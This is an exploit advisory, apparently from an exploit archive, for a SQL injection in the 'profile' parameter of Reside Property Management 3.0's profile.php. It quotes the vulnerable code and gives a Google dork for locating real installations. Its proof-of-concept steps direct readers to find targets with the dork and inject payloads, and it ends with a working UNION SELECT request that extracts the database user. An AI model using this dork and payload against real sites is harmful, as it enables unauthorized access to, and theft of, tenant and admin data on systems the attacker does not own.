33 lines
No EOL
1.3 KiB
Text
33 lines
No EOL
1.3 KiB
Text
# Exploit Title: Reside Property Management 3.0 - 'profile' SQL Injection
|
|
# Date: 2020-06-28
|
|
# Google Dork: "Copyright 2020 Reside Property Management"
|
|
# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)
|
|
# Team Members: Behzad Khalifeh , Milad Ranjbar
|
|
# Vendor Homepage: https://www.13plugins.com/product/reside-v3-rental-property-management-php-script/
|
|
# Version: v3.0 [Final Version]
|
|
# Tested on: Windows/Linux
|
|
# CVE: N/A
|
|
|
|
.:: Description ::.
|
|
RESIDE makes it easy to manage all of your tenants & properties, record payments, and keep everything accessible any time, from any computer or device.
|
|
|
|
|
|
.:: Vulnerable File ::.
|
|
profile.php
|
|
|
|
|
|
.:: Vulnerable Code ::.
|
|
- Line 21: $profile = $_GET['profile'];
|
|
- Line 22: $adminsName = preg_replace('/-/', ' ', $profile);
|
|
- Line 90: $sql = "SELECT * FROM admins WHERE adminName = '" . $adminsName . "'";
|
|
- Line 91: mysqli_query $result = mysqli_query($mysqli, $sql) or die ('-1' . mysqli_error());
|
|
|
|
|
|
.:: Proof Of Concept (PoC) ::.
|
|
Step 1 - Find Your Target With the above Dork.
|
|
Step 2 - Find profile.php File in Target
|
|
Step 3 - Inject Your Payloads in profile parameter
|
|
|
|
|
|
.:: Sample Request ::.
|
|
localhost/reside-rental-property-management/Reside/profile.php?profile=-21%27+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,user(),24,25,26%23 |